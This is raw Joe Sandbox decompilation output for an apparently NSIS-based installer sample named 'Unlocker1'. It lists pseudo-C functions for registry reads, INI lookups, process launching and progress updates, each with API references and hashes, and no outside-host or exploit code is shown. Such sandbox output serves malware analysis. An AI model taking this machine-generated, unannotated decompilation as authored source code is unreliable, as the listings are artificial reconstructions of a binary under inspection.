                                                                                                                                                              							_push(_t30);
                                                                                                                                                              							 *0x40af50 =  *_t30;
                                                                                                                                                              							GlobalFree();
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					goto L15;
                                                                                                                                                              				} else {
                                                                                                                                                              					while(1) {
                                                                                                                                                              						_t7 = _t7 - 1;
                                                                                                                                                              						if(_t30 == _t27) {
                                                                                                                                                              							break;
                                                                                                                                                              						}
                                                                                                                                                              						_t30 =  *_t30;
                                                                                                                                                              						if(_t7 != _t27) {
                                                                                                                                                              							continue;
                                                                                                                                                              						} else {
                                                                                                                                                              							if(_t30 == _t27) {
                                                                                                                                                              								break;
                                                                                                                                                              							} else {
                                                                                                                                                              								_t32 = _t30 + 4;
                                                                                                                                                              								E004059DD(0x409b50, _t30 + 4);
                                                                                                                                                              								_t21 =  *0x40af50; // 0x0
                                                                                                                                                              								E004059DD(_t32, _t21 + 4);
                                                                                                                                                              								_t24 =  *0x40af50; // 0x0
                                                                                                                                                              								_push(0x409b50);
                                                                                                                                                              								_push(_t24 + 4);
                                                                                                                                                              								E004059DD();
                                                                                                                                                              								L15:
                                                                                                                                                              								 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t37 - 4));
                                                                                                                                                              								_t13 = 0;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						goto L17;
                                                                                                                                                              					}
                                                                                                                                                              					_push(0x200010);
                                                                                                                                                              					_push(E004059FF(_t27, _t30, _t33, _t27, 0xffffffe8));
                                                                                                                                                              					E0040529E();
                                                                                                                                                              					_t13 = 0x7fffffff;
                                                                                                                                                              				}
                                                                                                                                                              				L17:
                                                                                                                                                              				return _t13;
                                                                                                                                                              			}














                                                                                                                                                              APIs
                                                                                                                                                              • GlobalFree.KERNEL32 ref: 00401B75
                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401B87
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                                              • String ID: show
                                                                                                                                                              • API String ID: 3394109436-839833857
                                                                                                                                                              • Opcode ID: 0c325e54f346298ce71c2e49e0b07d342970ac7a60d073ea7525efb906efe417
                                                                                                                                                              • Instruction ID: dedcc356a049729cc32aa0533657a7b943fc31f5ec42b7739970f76d43a2a4df
                                                                                                                                                              • Opcode Fuzzy Hash: 0c325e54f346298ce71c2e49e0b07d342970ac7a60d073ea7525efb906efe417
                                                                                                                                                              • Instruction Fuzzy Hash: D221A8B2604202DBD710FBA4DE8595F73A4FB44328724453BF606F32D0EB78A8119B6E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E00401E1B() {
                                                                                                                                                              				void* _t15;
                                                                                                                                                              				void* _t24;
                                                                                                                                                              				void* _t26;
                                                                                                                                                              				void* _t31;
                                                                                                                                                              
                                                                                                                                                              				_t28 = E004029F6(_t24);
                                                                                                                                                              				E00404D7B(0xffffffeb, _t13); // executed
                                                                                                                                                              				_t15 = E0040523D(_t28); // executed
                                                                                                                                                              				 *(_t31 + 8) = _t15;
                                                                                                                                                              				if(_t15 == _t24) {
                                                                                                                                                              					 *((intOrPtr*)(_t31 - 4)) = 1;
                                                                                                                                                              				} else {
                                                                                                                                                              					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
                                                                                                                                                              						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
                                                                                                                                                              							E00405D38(0xf);
                                                                                                                                                              						}
                                                                                                                                                              						GetExitCodeProcess( *(_t31 + 8), _t31 - 8); // executed
                                                                                                                                                              						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
                                                                                                                                                              							if( *(_t31 - 8) != _t24) {
                                                                                                                                                              								 *((intOrPtr*)(_t31 - 4)) = 1;
                                                                                                                                                              							}
                                                                                                                                                              						} else {
                                                                                                                                                              							E0040593B(_t26,  *(_t31 - 8));
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_push( *(_t31 + 8));
                                                                                                                                                              					CloseHandle();
                                                                                                                                                              				}
                                                                                                                                                              				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t31 - 4));
                                                                                                                                                              				return 0;
                                                                                                                                                              			}








                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00404D7B: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,007D06EE,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
                                                                                                                                                                • Part of subcall function 00404D7B: lstrlenA.KERNEL32(00402F8B,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,007D06EE,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
                                                                                                                                                                • Part of subcall function 00404D7B: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00402F8B,00402F8B,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,007D06EE,00000000), ref: 00404DD7
                                                                                                                                                                • Part of subcall function 00404D7B: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\), ref: 00404DE9
                                                                                                                                                                • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E0F
                                                                                                                                                                • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E29
                                                                                                                                                                • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E37
                                                                                                                                                                • Part of subcall function 0040523D: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422480,Error launching installer), ref: 00405262
                                                                                                                                                                • Part of subcall function 0040523D: CloseHandle.KERNEL32(?), ref: 0040526F
                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E55
                                                                                                                                                              • GetExitCodeProcess.KERNELBASE ref: 00401E65
                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401E8A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3521207402-0
                                                                                                                                                              • Opcode ID: 7b5ea6098163a721225316e6cb59af18a26e7111e3aadd83b40fd5b5fc9d02e7
                                                                                                                                                              • Instruction ID: e59f33a83564baa95368ed7ffa3d517a66a6b48d9bc55f4210568fb4246de59a
                                                                                                                                                              • Opcode Fuzzy Hash: 7b5ea6098163a721225316e6cb59af18a26e7111e3aadd83b40fd5b5fc9d02e7
                                                                                                                                                              • Instruction Fuzzy Hash: DB018071D04114EBCF11AFA1CD8599E7A75EF00348F20803BFA05B51E1C3794A81DB9A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 90%
                                                                                                                                                              			E004058C4(void* _a4, int _a8, char* _a12, int _a16, void* _a20) {
                                                                                                                                                              				long _t20;
                                                                                                                                                              				long _t23;
                                                                                                                                                              				long _t24;
                                                                                                                                                              				char* _t26;
                                                                                                                                                              
                                                                                                                                                              				asm("sbb eax, eax");
                                                                                                                                                              				_t26 = _a16;
                                                                                                                                                              				 *_t26 = 0;
                                                                                                                                                              				_t20 = RegOpenKeyExA(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
                                                                                                                                                              				if(_t20 == 0) {
                                                                                                                                                              					_a8 = 0x400;
                                                                                                                                                              					_t23 = RegQueryValueExA(_a20, _a12, 0,  &_a16, _t26,  &_a8); // executed
                                                                                                                                                              					if(_t23 != 0 || _a16 != 1 && _a16 != 2) {
                                                                                                                                                              						 *_t26 = 0;
                                                                                                                                                              					}
                                                                                                                                                              					_t26[0x3ff] = 0;
                                                                                                                                                              					_t24 = RegCloseKey(_a20); // executed
                                                                                                                                                              					return _t24;
                                                                                                                                                              				}
                                                                                                                                                              				return _t20;
                                                                                                                                                              			}








                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,00405B00,00000000,00000002,?,00000002,00321F35,?,00405B00,80000002,Software\Microsoft\Windows\CurrentVersion,00321F35,Remove folder: ,00745DED), ref: 004058ED
                                                                                                                                                              • RegQueryValueExA.KERNELBASE(00321F35,?,00000000,00405B00,00321F35,00405B00), ref: 0040590E
                                                                                                                                                              • RegCloseKey.KERNELBASE(?), ref: 0040592F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3677997916-0
                                                                                                                                                              • Opcode ID: 20ca1dc64cf80f35bde4a5a459f169022cfe0f17446037da1f5ac97088a586f8
                                                                                                                                                              • Instruction ID: 4090c2ea748c6a1ef83dea1f090ecbfc83cda06d8c091eb14dd66de5cad0d057
                                                                                                                                                              • Opcode Fuzzy Hash: 20ca1dc64cf80f35bde4a5a459f169022cfe0f17446037da1f5ac97088a586f8
                                                                                                                                                              • Instruction Fuzzy Hash: DA0156B144020EEFDF228F64EC48AEB3FACEF143A4F004436F944A6220D235D964DBA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E00402427(int* __ebx, char* __esi) {
                                                                                                                                                              				int _t8;
                                                                                                                                                              				long _t11;
                                                                                                                                                              				int* _t14;
                                                                                                                                                              				void* _t18;
                                                                                                                                                              				char* _t20;
                                                                                                                                                              				void* _t22;
                                                                                                                                                              				void* _t25;
                                                                                                                                                              
                                                                                                                                                              				_t20 = __esi;
                                                                                                                                                              				_t14 = __ebx;
                                                                                                                                                              				_t18 = E00402B00(_t25, 0x20019);
                                                                                                                                                              				_t8 = E004029D9(3);
                                                                                                                                                              				 *__esi = __ebx;
                                                                                                                                                              				if(_t18 == __ebx) {
                                                                                                                                                              					L7:
                                                                                                                                                              					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                                                                                              				} else {
                                                                                                                                                              					 *(_t22 + 8) = 0x3ff;
                                                                                                                                                              					if( *((intOrPtr*)(_t22 - 0x14)) == __ebx) {
                                                                                                                                                              						_t11 = RegEnumValueA(_t18, _t8, __esi, _t22 + 8, __ebx, __ebx, __ebx, __ebx);
                                                                                                                                                              						__eflags = _t11;
                                                                                                                                                              						if(_t11 != 0) {
                                                                                                                                                              							goto L7;
                                                                                                                                                              						} else {
                                                                                                                                                              							goto L4;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						RegEnumKeyA(_t18, _t8, __esi, 0x3ff);
                                                                                                                                                              						L4:
                                                                                                                                                              						_t20[0x3ff] = _t14;
                                                                                                                                                              						_push(_t18); // executed
                                                                                                                                                              						RegCloseKey(); // executed
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t22 - 4));
                                                                                                                                                              				return 0;
                                                                                                                                                              			}











                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00402B00: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B28
                                                                                                                                                              • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402455
                                                                                                                                                              • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402468
                                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsv5446.tmp,00000000,?,?,?,00000100,?,?,?,00000011,00000002), ref: 0040247D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Enum$CloseOpenValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 167947723-0
                                                                                                                                                              • Opcode ID: e2f80b80baa03604ef96cc0b5eb0a812df5ce76e2325c321a32b65c77b87080a
                                                                                                                                                              • Instruction ID: 323df63ddd6a9f09ec1088b6260a8986ee2a6ccff1f267de23e4284cd7b62ed6
                                                                                                                                                              • Opcode Fuzzy Hash: e2f80b80baa03604ef96cc0b5eb0a812df5ce76e2325c321a32b65c77b87080a
                                                                                                                                                              • Instruction Fuzzy Hash: 2BF0A271A04201EFE715AF659E88EBB7A6CDB40388F10843FF406A61C0D2B85D42967A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00402267(char __ebx) {
                                                                                                                                                              				CHAR* _t8;
                                                                                                                                                              				CHAR* _t10;
                                                                                                                                                              				CHAR* _t20;
                                                                                                                                                              				void* _t22;
                                                                                                                                                              				void* _t25;
                                                                                                                                                              
                                                                                                                                                              				 *(_t22 + 8) = 0x7e4e21;
                                                                                                                                                              				_t8 = E004029F6(1);
                                                                                                                                                              				 *(_t22 - 0x30) = E004029F6(0x12);
                                                                                                                                                              				_t10 = E004029F6(0xffffffdd);
                                                                                                                                                              				_t3 = _t22 + 8; // 0x7e4e21
                                                                                                                                                              				GetPrivateProfileStringA(_t8,  *(_t22 - 0x30), _t3, _t20, 0x3ff, _t10); // executed
                                                                                                                                                              				_t25 =  *_t20 -  *(_t22 + 8);
                                                                                                                                                              				if(_t25 == 0) {
                                                                                                                                                              					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                                                                                              					 *_t20 = __ebx;
                                                                                                                                                              				}
                                                                                                                                                              				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t22 - 4));
                                                                                                                                                              				return 0;
                                                                                                                                                              			}









                                                                                                                                                              APIs
                                                                                                                                                              • GetPrivateProfileStringA.KERNEL32(00000000,?,!N~,?,000003FF,00000000), ref: 00402297
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PrivateProfileString
                                                                                                                                                              • String ID: !N~
                                                                                                                                                              • API String ID: 1096422788-529124213
                                                                                                                                                              • Opcode ID: 83959307df37686c86d75e4de7286cd2fa4b3ebc5ce89ae33a3a58613c6f73fc
                                                                                                                                                              • Instruction ID: 21cd7503a9a85725414fd2f210def48a3ed87e9b9f52c0cacc02f36f79452d1c
                                                                                                                                                              • Opcode Fuzzy Hash: 83959307df37686c86d75e4de7286cd2fa4b3ebc5ce89ae33a3a58613c6f73fc
                                                                                                                                                              • Instruction Fuzzy Hash: E4E04F71900208BBDB50AFA1CD49DAE3AA8BF043C4F100129FA10AB1C1DBB89541AB55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00403D68(int _a4) {
                                                                                                                                                              				long _t3;
                                                                                                                                                              
                                                                                                                                                              				if(_a4 == 0x78) {
                                                                                                                                                              					 *0x42364c =  *0x42364c + 1;
                                                                                                                                                              				}
                                                                                                                                                              				_t3 = SendMessageA( *0x423e88, 0x408, _a4, 0); // executed
                                                                                                                                                              				return _t3;
                                                                                                                                                              			}





                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageA.USER32(00000408,?,00000000,004039CA), ref: 00403D86
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                              • String ID: x
                                                                                                                                                              • API String ID: 3850602802-2363233923
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                              			E004023AF(int* __ebx, char* __esi) {
                                                                                                                                                              				char* _t19;
                                                                                                                                                              				void* _t35;
                                                                                                                                                              				void* _t39;
                                                                                                                                                              				void* _t42;
                                                                                                                                                              
                                                                                                                                                              				_t37 = __esi;
                                                                                                                                                              				_t29 = __ebx;
                                                                                                                                                              				_t35 = E00402B00(_t42, 0x20019);
                                                                                                                                                              				_t19 = E004029F6(0x33);
                                                                                                                                                              				 *__esi = __ebx;
                                                                                                                                                              				if(_t35 == __ebx) {
                                                                                                                                                              					 *(_t39 - 4) = 1;
                                                                                                                                                              				} else {
                                                                                                                                                              					 *(_t39 - 8) = 0x3ff;
                                                                                                                                                              					if(RegQueryValueExA(_t35, _t19, __ebx, _t39 + 8, __esi, _t39 - 8) != 0) {
                                                                                                                                                              						L7:
                                                                                                                                                              						 *_t37 = _t29;
                                                                                                                                                              						 *(_t39 - 4) = 1;
                                                                                                                                                              					} else {
                                                                                                                                                              						if( *(_t39 + 8) == 4) {
                                                                                                                                                              							__eflags =  *(_t39 - 0x14) - __ebx;
                                                                                                                                                              							 *(_t39 - 4) = 0 |  *(_t39 - 0x14) == __ebx;
                                                                                                                                                              							E0040593B(__esi,  *__esi);
                                                                                                                                                              						} else {
                                                                                                                                                              							if( *(_t39 + 8) == 1 ||  *(_t39 + 8) == 2) {
                                                                                                                                                              								 *(_t39 - 4) =  *(_t39 - 0x14);
                                                                                                                                                              								_t37[ *(_t39 - 8)] = _t29;
                                                                                                                                                              							} else {
                                                                                                                                                              								goto L7;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_push(_t35); // executed
                                                                                                                                                              					RegCloseKey(); // executed
                                                                                                                                                              				}
                                                                                                                                                              				 *0x423f08 =  *0x423f08 +  *(_t39 - 4);
                                                                                                                                                              				return 0;
                                                                                                                                                              			}








                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00402B00: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B28
                                                                                                                                                              • RegQueryValueExA.ADVAPI32(00000000,00000000,?,000003FF,?,?,?,?,00000033), ref: 004023DF
                                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsv5446.tmp,00000000,?,?,?,00000100,?,?,?,00000011,00000002), ref: 0040247D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3677997916-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 69%
                                                                                                                                                              			E00401389(signed int _a4) {
                                                                                                                                                              				intOrPtr* _t6;
                                                                                                                                                              				void* _t8;
                                                                                                                                                              				void* _t10;
                                                                                                                                                              				signed int _t11;
                                                                                                                                                              				void* _t12;
                                                                                                                                                              				intOrPtr _t15;
                                                                                                                                                              				signed int _t16;
                                                                                                                                                              				signed int _t17;
                                                                                                                                                              				void* _t18;
                                                                                                                                                              
                                                                                                                                                              				_t17 = _a4;
                                                                                                                                                              				while(_t17 >= 0) {
                                                                                                                                                              					_t15 =  *0x423eb0; // 0x740e84
                                                                                                                                                              					_t6 = _t17 * 0x1c + _t15;
                                                                                                                                                              					if( *_t6 == 1) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_push(_t6); // executed
                                                                                                                                                              					_t8 = E00401434(); // executed
                                                                                                                                                              					if(_t8 == 0x7fffffff) {
                                                                                                                                                              						return 0x7fffffff;
                                                                                                                                                              					}
                                                                                                                                                              					_t10 = E0040136D(_t8);
                                                                                                                                                              					if(_t10 != 0) {
                                                                                                                                                              						_t11 = _t10 - 1;
                                                                                                                                                              						_t16 = _t17;
                                                                                                                                                              						_t17 = _t11;
                                                                                                                                                              						_t12 = _t11 - _t16;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t12 = _t10 + 1;
                                                                                                                                                              						_t17 = _t17 + 1;
                                                                                                                                                              					}
                                                                                                                                                              					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                                                                                                              						 *0x42366c =  *0x42366c + _t12;
                                                                                                                                                              						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42366c, 0x7530,  *0x423654), 0); // executed
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return 0;
                                                                                                                                                              			}












                                                                                                                                                              0x004013c9
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                              • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
Memory Dump Source
• Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                              • Opcode ID: 1c916d205157ad73d7dec8fa4d75793a4825b6d15c61c30e95467a340dd2df53
                                                                                                                                                              • Instruction ID: 9357c62ddf9e7b3c824d0b87f8e4bad160879ee2cb8093492041203a2cf1b2c1
                                                                                                                                                              • Opcode Fuzzy Hash: 1c916d205157ad73d7dec8fa4d75793a4825b6d15c61c30e95467a340dd2df53
                                                                                                                                                              • Instruction Fuzzy Hash: A301F431724210ABE7295B389D04B2A36ADF710355F10427BF855F66F1D67CDC028B4D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004022A7(void* __ebx) {
                                                                                                                                                              				char* _t6;
                                                                                                                                                              				void* _t11;
                                                                                                                                                              				long _t13;
                                                                                                                                                              				void* _t15;
                                                                                                                                                              				long _t19;
                                                                                                                                                              				void* _t22;
                                                                                                                                                              				void* _t23;
                                                                                                                                                              
                                                                                                                                                              				_t15 = __ebx;
                                                                                                                                                              				_t26 =  *(_t23 - 0x14) - __ebx;
                                                                                                                                                              				if( *(_t23 - 0x14) != __ebx) {
                                                                                                                                                              					_t6 = E004029F6(0x22);
                                                                                                                                                              					_t18 =  *(_t23 - 0x14) & 0x00000002;
                                                                                                                                                              					__eflags =  *(_t23 - 0x14) & 0x00000002;
                                                                                                                                                              					_t19 = E00402A36(E00402AEB( *((intOrPtr*)(_t23 - 0x20))), _t6, _t18);
                                                                                                                                                              					goto L4;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t11 = E00402B00(_t26, 2); // executed
                                                                                                                                                              					_t22 = _t11;
                                                                                                                                                              					if(_t22 == __ebx) {
                                                                                                                                                              						L6:
